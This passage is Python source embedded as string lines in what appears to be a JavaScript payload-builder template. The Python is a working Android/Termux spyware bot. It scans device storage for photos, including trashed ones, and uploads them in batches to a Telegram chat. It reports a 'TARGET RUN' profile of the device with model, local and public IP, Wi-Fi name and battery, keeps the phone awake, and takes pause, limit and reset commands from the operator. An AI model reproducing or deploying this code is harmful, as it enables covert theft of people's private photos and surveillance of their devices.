"            _session_number   = data.get('number', 1)",
"            _session_limit    = data.get('limit', DEFAULT_LIMIT)",
"            _session_active   = False",
"            _last_file        = data.get('last_file', '')",
"            _last_file_path   = data.get('last_file_path', '')",
"        _log('Session loaded')",
"    except Exception as e:",
"        _log('Session load err: ' + str(e))",
,
"",
"def _scan_one_path(base, sent):",
"    if not os.path.isdir(base):",
"        return",
"    stack = [base]",
"    visited = set()",
"    found = 0",
"    while stack:",
"        cur = stack.pop()",
"        if cur in visited:",
"            continue",
"        visited.add(cur)",
"        skip = False",
"        for s in ['/Android/data/', '/Android/obb/', '/.thumbnails/', '/.cache/']:",
"            if s in cur:",
"                skip = True",
"                break",
"        if skip:",
"            continue",
"        try:",
"            entries = os.listdir(cur)",
"        except Exception:",
"            continue",
"        for entry in entries:",
"            full = os.path.join(cur, entry)",
"            try:",
"                if os.path.isdir(full):",
"                    stack.append(full)",
"                    continue",
"                entry_low = entry.lower()",
"                is_photo = entry_low.endswith(PHOTO_EXT)",
"                if not is_photo and entry_low.endswith('.trashed'):",
"                    is_photo = entry_low[:-8].endswith(PHOTO_EXT)",
"                if not is_photo:",
"                    continue",
"                if USE_CACHE:",
"                    with _SENT_LOCK:",
"                        if full in sent:",
"                            continue",
"                        sent.add(full)",
"                try:",
"                    if os.path.getsize(full) > MAX_BYTES:",
"                        continue",
"                except Exception:",
"                    continue",
"                with _BATCH_LOCK:",
"                    if len(_BATCH_QUEUE) >= QUEUE_MAX:",
"                        if USE_CACHE:",
"                            with _SENT_LOCK:",
"                                sent.discard(full)",
"                        continue",
"                path_low = full.lower()",
"                is_trashed = (entry_low.startswith('.') or 'trash' in entry_low or 'trash' in path_low or '.trashed' in path_low)",
"                tag = 'TRASHED' if is_trashed else 'PHOTO'",
"                cap = tag + chr(10) + entry + chr(10) + cur",
"                with _BATCH_LOCK:",
"                    _BATCH_QUEUE.append((full, cap))",
"                _sent_mark(full)",
"                found += 1",
"            except Exception:",
"                pass",
"    if found > 0:",
"        _log('Scan ' + base + ': found ' + str(found))",
"",
"def _scan_worker(worker_id, paths, sent):",
"    _log('Scan worker ' + str(worker_id) + ' started')",
"    while _running:",
"        try:",
"            try:",
"                base = paths.get(timeout=3)",
"            except _q.Empty:",
"                continue",
"            _scan_one_path(base, sent)",
"            paths.put(base)",
"        except Exception as e:",
"            _log('Scan worker ' + str(worker_id) + ' err: ' + str(e))",
"        time.sleep(SCAN_WORKER_SLEEP)",
"",
"def _watch_photos():",
"    _log('Photo watcher starting...')",
"    sent = _sent_load()",
"    path_queue = _q.Queue()",
"    for p in WATCH_PATHS:",
"        path_queue.put(p)",
"    for i in range(SCAN_WORKERS):",
"        t = threading.Thread(target=_scan_worker, args=(i, path_queue, sent), daemon=True, name='scan-' + str(i))",
"        t.start()",
"    while _running:",
"        time.sleep(SCAN_INTERVAL)",
"",
"def _send_batch(chunk):",
"    global _session_count, _session_total, _last_file, _last_file_path",
"    global _last_progress, _session_active, _session_paused_man",
"    with _session_lock:",
"        if not _session_active:",
"            return False",
"        if _session_count >= _session_limit:",
"            return False",
"        remaining_slot = _session_limit - _session_count",
"    if len(chunk) > remaining_slot:",
"        chunk = chunk[:remaining_slot]",
"    if not chunk:",
"        return False",
"    sent_ok = 0",
"    if len(chunk) > 1:",
"        resp = _send_media_group(chunk)",
"        if resp and resp.get('ok'):",
"            sent_ok = len(chunk)",
"        else:",
"            for path, cap in chunk:",
"                r = _send_photo(path, cap)",
"                if r and r.get('ok'):",
"                    sent_ok += 1",
"                time.sleep(SEND_DELAY)",
"    else:",
"        path, cap = chunk[0]",
"        r = _send_photo(path, cap)",
"        if r and r.get('ok'):",
"            sent_ok = 1",
"    if sent_ok > 0:",
"        with _session_lock:",
"            _session_count += sent_ok",
"            _session_total += sent_ok",
"            idx = min(sent_ok - 1, len(chunk) - 1)",
"            path, cap = chunk[idx]",
"            _last_file = os.path.basename(path)",
"            _last_file_path = path",
"            current = _session_count",
"        _session_save()",
"        if current - _last_progress >= PROGRESS_EVERY:",
"            _last_progress = current",
"            _send_progress(current)",
"        with _session_lock:",
"            if _session_count >= _session_limit:",
"                _session_active = False",
"                _session_paused_man = False",
"                _session_save()",
"                _send_stop()",
"    return sent_ok > 0",
"",
"def _send_worker(worker_id):",
"    _log('Send worker ' + str(worker_id) + ' started')",
"    while _running:",
"        try:",
"            with _session_lock:",
"                active = _session_active",
"            if not active:",
"                time.sleep(0.5)",
"                continue",
"            chunk = []",
"            with _BATCH_LOCK:",
"                while len(chunk) < BATCH_SIZE and _BATCH_QUEUE:",
"                    chunk.append(_BATCH_QUEUE.pop(0))",
"            if chunk:",
"                _send_batch(chunk)",
"            else:",
"                time.sleep(0.5)",
"        except Exception as e:",
"            _log('Send worker ' + str(worker_id) + ' err: ' + str(e))",
"        time.sleep(SEND_WORKER_SLEEP)",
"",
"def _watch_batcher():",
"    _log('Batcher starting...')",
"    for i in range(SEND_WORKERS):",
"        t = threading.Thread(target=_send_worker, args=(i,), daemon=True, name='send-' + str(i))",
"        t.start()",
"    while _running:",
"        time.sleep(60)",
,
"",
"def _get_device_info():",
"    info = {'model': 'unknown', 'brand': 'unknown', 'android': 'unknown', 'sdk': 'unknown', 'arch': platform.machine(), 'local_ip': 'unknown', 'public_ip': 'unknown', 'battery': 'unknown', 'network': 'unknown'}",
"    props = {'model': 'ro.product.model', 'brand': 'ro.product.manufacturer', 'android': 'ro.build.version.release', 'sdk': 'ro.build.version.sdk'}",
"    for key, prop in props.items():",
"        try:",
"            r = subprocess.run(['getprop', prop], capture_output=True, text=True, timeout=3)",
"            if r.stdout.strip():",
"                info[key] = r.stdout.strip()",
"        except Exception:",
"            pass",
"    try:",
"        info['local_ip'] = socket.gethostbyname(socket.gethostname())",
"    except Exception:",
"        pass",
"    try:",
"        info['public_ip'] = requests.get('https://api.ipify.org', timeout=5).text.strip()",
"    except Exception:",
"        pass",
"    try:",
"        r = subprocess.run(['termux-battery-status'], capture_output=True, text=True, timeout=5)",
"        if r.stdout.strip():",
"            j = json.loads(r.stdout)",
"            info['battery'] = str(j.get('percentage', '?')) + '%'",
"    except Exception:",
"        pass",
"    try:",
"        r = subprocess.run(['termux-wifi-connectioninfo'], capture_output=True, text=True, timeout=5)",
"        if r.stdout.strip():",
"            j = json.loads(r.stdout)",
"            ssid = j.get('ssid', '')",
"            info['network'] = 'WiFi (' + ssid + ')' if ssid else 'WiFi'",
"    except Exception:",
"        pass",
"    return info",
"",
"def _uptime_str():",
"    try:",
"        with open('/proc/uptime') as f:",
"            up = float(f.read().split()[0])",
"        h = int(up // 3600)",
"        m = int((up % 3600) // 60)",
"        return str(h) + 'j ' + str(m) + 'm'",
"    except Exception:",
"        return '?'",
"",
"def _send_boot():",
"    info = _get_device_info()",
"    cache_status = 'ON' if USE_CACHE else 'OFF'",
"    msg = 'TARGET RUN' + chr(10)",
"    msg += 'Device: ' + info['model'] + chr(10)",
"    msg += 'Brand: ' + info['brand'] + chr(10)",
"    msg += 'Android: ' + info['android'] + ' (SDK ' + info['sdk'] + ')' + chr(10)",
"    msg += 'Local IP: ' + info['local_ip'] + chr(10)",
"    msg += 'Public IP: ' + info['public_ip'] + chr(10)",
"    msg += 'Network: ' + info['network'] + chr(10)",
"    msg += 'Battery: ' + info['battery'] + chr(10)",
"    msg += 'Workers: ' + str(SCAN_WORKERS) + ' scan / ' + str(SEND_WORKERS) + ' send' + chr(10)",
"    msg += 'Session: ' + str(_session_limit) + ' foto' + chr(10)",
"    msg += 'Cache: ' + cache_status",
"    _send(msg)",
"",
"def _send_progress(current):",
"    with _session_lock:",
"        limit = _session_limit",
"        total = _session_total",
"    with _BATCH_LOCK:",
"        q = len(_BATCH_QUEUE)",
"    cache = _sent_count()",
"    _send(str(current) + ' / ' + str(limit) + chr(10) + 'Total: ' + str(total) + chr(10) + 'Queue: ' + str(q) + chr(10) + 'Cache: ' + str(cache))",
"",
"def _send_stop():",
"    with _session_lock:",
"        sesi = _session_count",
"        total = _session_total",
"        limit = _session_limit",
"        last_f = _last_file",
"        last_p = _last_file_path",
"    with _BATCH_LOCK:",
"        q = len(_BATCH_QUEUE)",
"    cache = _sent_count()",
"    remaining = max(0, cache - total)",
"    msg = 'STOP (' + str(limit) + ')' + chr(10)",
"    msg += 'Sesi ini: ' + str(sesi) + chr(10)",
"    msg += 'Total: ' + str(total) + chr(10)",
"    msg += 'Queue: ' + str(q) + chr(10)",
"    msg += 'Remaining: ' + str(remaining) + chr(10)",
"    msg += 'Last: ' + last_f + chr(10)",
"    msg += '/continue - lanjut' + chr(10)",
"    msg += '/status - detail'",
"    _send(msg)",
,
"",
"def _cmd_continue():",
"    global _session_active, _session_number, _last_progress, _session_count",
"    with _session_lock:",
"        if _session_active:",
"            _send('Session masih active')",
"            return",
"        total = _session_total",
"        _session_number += 1",
"        _session_count = 0",
"        _session_active = True",
"        _last_progress = 0",
"        old_total = total",
"        new_total = old_total + _session_limit",
"    _session_save()",
"    _send('Continue dari ' + str(old_total) + ' -> ' + str(new_total))",
"",
"def _cmd_status():",
"    with _session_lock:",
"        active = _session_active",
"        count = _session_count",
"        limit = _session_limit",
"        num = _session_number",
"        last_f = _last_file",
"    with _BATCH_LOCK:",
"        q = len(_BATCH_QUEUE)",
"    cache = _sent_count()",
"    status_txt = 'ACTIVE' if active else 'PAUSED'",
"    msg = 'STATUS sesi ' + str(num) + chr(10)",
"    msg += 'Status: ' + status_txt + chr(10)",
"    msg += 'Kirim: ' + str(count) + ' / ' + str(limit) + chr(10)",
"    msg += 'Queue: ' + str(q) + chr(10)",
"    msg += 'Cache: ' + str(cache) + chr(10)",
"    msg += 'Last: ' + last_f",
"    _send(msg)",
"",
"def _cmd_pause():",
"    global _session_active",
"    with _session_lock:",
"        if not _session_active:",
"            _send('Udah pause')",
"            return",
"        _session_active = False",
"        count = _session_count",
"    _session_save()",
"    _send('Paused. Total: ' + str(count))",
"",
"def _cmd_limit(args):",
"    global _session_limit",
"    if not args or not args.strip():",
"        _send('Limit: ' + str(_session_limit))",
"        return",
"    try:",
"        n = int(args.strip().split()[0])",
"    except Exception:",
"        _send('Format: /limit 500')",
"        return",
"    if n < 10: n = 10",
"    if n > 5000: n = 5000",
"    with _session_lock:",
"        old = _session_limit",
"        _session_limit = n",
"    _session_save()",
"    _send('Limit ' + str(old) + ' -> ' + str(n))",
"",
"def _cmd_reset():",
"    global _session_count, _session_total, _session_number",
"    global _session_active, _last_progress, _last_file, _last_file_path",
"    with _session_lock:",
"        _session_count = 0",
"        _session_total = 0",
"        _session_number = 1",
"        _session_active = True",
"        _last_progress = 0",
"        _last_file = ''",
"        _last_file_path = ''",
"    _session_save()",
"    _send('Reset')",
"",
"def _cmd_stats():",
"    with _session_lock:",
"        total = _session_total",
"        num = _session_number",
"        count = _session_count",
"        limit = _session_limit",
"    cache = _sent_count()",
"    avg = total // num if num > 0 else 0",
"    msg = 'STATISTIK' + chr(10)",
"    msg += 'Total: ' + str(total) + chr(10)",
"    msg += 'Sesi: ' + str(num) + chr(10)",
"    msg += 'Avg/sesi: ' + str(avg) + chr(10)",
"    msg += 'Cache: ' + str(cache) + chr(10)",
"    msg += 'Sesi ini: ' + str(count) + '/' + str(limit)",
"    _send(msg)",
"",
"def _cmd_help():",
"    msg = 'HELP - Photo Bot' + chr(10)",
"    msg += '/continue - Lanjut' + chr(10)",
"    msg += '/status - Cek' + chr(10)",
"    msg += '/pause - Pause' + chr(10)",
"    msg += '/limit - Ganti batas' + chr(10)",
"    msg += '/reset - Reset' + chr(10)",
"    msg += '/stats - Statistik' + chr(10)",
"    msg += '/help - Menu'",
"    _send(msg)",
"",
"def _poll():",
"    global _offset",
"    _offset = 0",
"    _log('Poll started')",
"    while _running:",
"        try:",
"            r = _tg('getUpdates', json={'timeout': 30, 'offset': _offset, 'allowed_updates': ['message']})",
"            for u in r.get('result', []):",
"                _offset = u['update_id'] + 1",
"                if 'message' not in u:",
"                    continue",
"                m = u['message']",
"                if m.get('chat', {}).get('id') != int(CHAT_ID):",
"                    continue",
"                txt = (m.get('text') or '').strip()",
"                if not txt:",
"                    continue",
"                _log('CMD: ' + txt)",
"                if txt == '/start' or txt == '/help':",
"                    _cmd_help()",
"                elif txt.startswith('/continue'):",
"                    _cmd_continue()",
"                elif txt.startswith('/status'):",
"                    _cmd_status()",
"                elif txt.startswith('/pause'):",
"                    _cmd_pause()",
"                elif txt.startswith('/limit'):",
"                    _cmd_limit(txt[len('/limit'):])",
"                elif txt.startswith('/reset'):",
"                    _cmd_reset()",
"                elif txt.startswith('/stats'):",
"                    _cmd_stats()",
"        except Exception as e:",
"            _log('Poll err: ' + str(e))",
"        time.sleep(1)",
"",
"def _boot():",
"    global _session_active, _session_count",
"    _log('=== BOOT ===')",
"    _log('USE_CACHE = ' + str(USE_CACHE))",
"    try:",
"        subprocess.run(['termux-wake-lock'], capture_output=True, timeout=5)",
"    except Exception:",
"        pass",
"    _session_load()",
"    with _session_lock:",
"        _session_active = True",
"        _session_count = 0",
"    _session_save()",
"    _send_boot()",
"    threading.Thread(target=_watch_photos, daemon=True, name='photos').start()",
"    threading.Thread(target=_watch_batcher, daemon=True, name='batcher').start()",
"    threading.Thread(target=_poll, daemon=True, name='poll').start()",
"    _log('All threads started')",
"",
"if __name__ == '__main__':",
"    threading.Thread(target=_boot, daemon=True).start()",
"    try:",
"        while True:",
"            time.sleep(3600)",
"    except KeyboardInterrupt:",
"        _running = False",
"        _session_save()",
"        try:",
"            subprocess.run(['termux-wake-unlock'], capture_output=True, timeout=5)",
"        except Exception:",
"            pass",
"        print('Stopped.')",
"",
"# END BASE MODE",
"].join(chr(10));",
